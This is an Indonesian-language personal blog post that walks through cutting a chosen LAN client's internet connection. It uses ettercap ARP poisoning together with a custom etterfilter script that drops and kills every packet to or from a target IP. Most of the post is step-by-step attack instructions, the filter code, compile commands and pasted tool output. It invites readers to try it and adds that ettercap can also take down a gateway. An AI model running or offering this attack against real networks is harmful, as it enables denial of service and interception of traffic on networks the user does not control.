Mematikan Koneksi Komputer Client dalam jaringan LAN ^_^ (devil)

akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe. lama kelamaan makin menjadi-jadi setelah keterangan dari wireshark menayangkan error yang sangat banyak, keterangan errornya adalah duplicate IP yang random. setiap hostname tersebut OL, pasti jaringan kacau. hostnamenya adalah “NUMPANK-OM”. ternyata komputer tersebut kena virus yang bikin kacau jaringan. inisiatif gw bagi tugas dengan temen gw aji. hehe, kayak FBI aja. dia ngecut koneksi dari IP yang bermasalah tersebut dan ngeflood balik. mau gak mau harus seperti itu, kalo nggak ya semua client pada kacau. tapi tetep gak kapok n kayaknya semua yang pake windus mulai terinfeksi.. (doh) payah ni sistem operasi satu nih. ya udah, gw coba cara yang menurut gw ampuh ini.. hehe. yaitu dengan metode ARP POISONING. gak usah dijelasin, langsung praktek aja yah. implementasinya begini :

(disarankan untuk memakai LINUX)
1. install ettercap
2. jalankan ettercap
3. pilih sniff -> unnified sniffing -> dan pilih interface yang terkoneksi tersebut.

Listening on eth1… (Ethernet)

eth1 -> 00:16:E6:DC:F1:DB 172.16.30.7 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

4. kemudian pilih host -> scan for host (tunggu sampai scanning selesai.

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
30 hosts added to the hosts list…

5. kemudian pilih host -> host list
disitu ada list ip client yang sedang OL, contohnya salah satunya : 172.16.30.6 <- ini adalah IP victim yang akan kita putuskan koneksinya. klik di IP tersebut dan klik "add to target 1"

Host 172.16.30.6 added to TARGET1

6. kemudian buat file (terserah mau pake kate,gedit,atai apapun editor kesenangan anda) dan masukkan script ini :

if (ip.src == ’172.16.30.6′ || ip.dst == ’172.16.30.6′) {
drop();
kill();
msg(“Packet Dropped\n”);
}

nb : ip 172.16.30.6 disesuaikan dengan IP target anda
fite tersebut save ke dalam bentuk *.eft – ex: target.eft

7. convert file tersebut ke target.ef dan copy ke /usr/share/ettercap/
spyro@dhymaz-chua:~$ sudo etterfilter target.eft -o target.ef
spyro@dhymaz-chua:~$ sudo cp target.ef /usr/share/ettercap/

8. kembali ke ettercap, kemudiam pilih mitm -> arp poisoning -> centang “sniff remote connection” dan klik ok.

ARP poisoning victims:

GROUP 1 : 172.16.30.6 00:14:85:2D:50:3B

GROUP 2 : ANY (all the hosts in the list)

9. klik filters -> load a filter dan pilih file target.ef tadi yang telah dibuat.

GROUP 2 : ANY (all the hosts in the list)
Content filters loaded from /usr/share/ettercap/sekber.ef…

10. dan saya telah memastikannya, ngeping ke server lancar, ngeping ke internet lancar, ngeping ke ip victim lancar, tapi victim tidak akan bisa konek ke internet.

begitulah kurang lebih penjelasannya. selamat mencoba… (target yang saya serang dalam membuat artikelini menggunakan windows).
ettercap juga bisa dipakai untuk mematikan gateway. wow seremm.. haha.. masih banyak lagi yang bisa dilakukan oleh ettercap.. pinter2 explorasi aja yaa ^_^

regards : dhymaz_spyro